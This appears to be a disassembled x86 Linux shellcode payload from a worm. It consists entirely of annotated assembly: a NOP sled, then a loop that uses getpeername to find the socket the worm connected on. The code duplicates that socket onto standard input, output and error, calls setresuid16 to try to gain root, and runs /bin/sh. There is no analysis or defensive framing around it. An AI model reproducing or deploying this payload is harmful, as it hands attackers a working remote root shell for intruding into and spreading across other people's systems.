000000D0 EB0A jmp short 0xdc 000000D2 90 nop 000000D3 90 nop 000000D4 90 nop 000000D5 90 nop 000000D6 90 nop 000000D7 90 nop 000000D8 90 nop 000000D9 90 nop 000000DA 90 nop 000000DB 90 nop 000000DC 31DB xor ebx,ebx 000000DE 89E7 mov edi,esp 000000E0 8D7710 lea esi,[edi+0x10] 000000E3 897704 mov [edi+0x4],esi 000000E6 8D4F20 lea ecx,[edi+0x20] 000000E9 894F08 mov [edi+0x8],ecx 000000EC B310 mov bl,0x10 000000EE 8919 mov [ecx],ebx 000000F0 31C9 xor ecx,ecx 000000F2 B1FF mov cl,0xff ; search for socket that connects to the worm 000000F4 890F mov [edi],ecx 000000F6 51 push ecx 000000F7 31C0 xor eax,eax 000000F9 B066 mov al,0x66 ; socketcall 000000FB B307 mov bl,0x7 ; getpeername 000000FD 89F9 mov ecx,edi 000000FF CD80 int 0x80 00000101 59 pop ecx 00000102 31DB xor ebx,ebx 00000104 39D8 cmp eax,ebx 00000106 750A jnz 0x112 00000108 66B81234 mov ax,0x3412 ; replaced with local port # 0000010C 66394602 cmp [esi+0x2],ax 00000110 7402 jz 0x114 00000112 E2E0 loop 0xf4 00000114 89CB mov ebx,ecx 00000116 31C9 xor ecx,ecx 00000118 B103 mov cl,0x3 ; duplicate socket onto standard input, output and error 0000011A 31C0 xor eax,eax 0000011C B03F mov al,0x3f ; dup2 0000011E 49 dec ecx 0000011F CD80 int 0x80 00000121 41 inc ecx 00000122 E2F6 loop 0x11a ; try to get root 00000124 31C9 xor ecx,ecx 00000126 F7E1 mul ecx 00000128 51 push ecx 00000129 5B pop ebx 0000012A B0A4 mov al,0xa4 ; setresuid16 0000012C CD80 int 0x80 ; execute /bin/sh 0000012E 31C0 xor eax,eax 00000130 50 push eax 00000131 682F2F7368 push dword 0x68732f2f ; "//sh" 00000136 682F62696E push dword 0x6e69622f ; "/bin" 0000013B 89E3 mov ebx,esp 0000013D 50 push eax 0000013E 53 push ebx 0000013F 89E1 mov ecx,esp 00000141 99 cdq 00000142 B00B mov al,0xb ; execve 00000144 CD80 int 0x80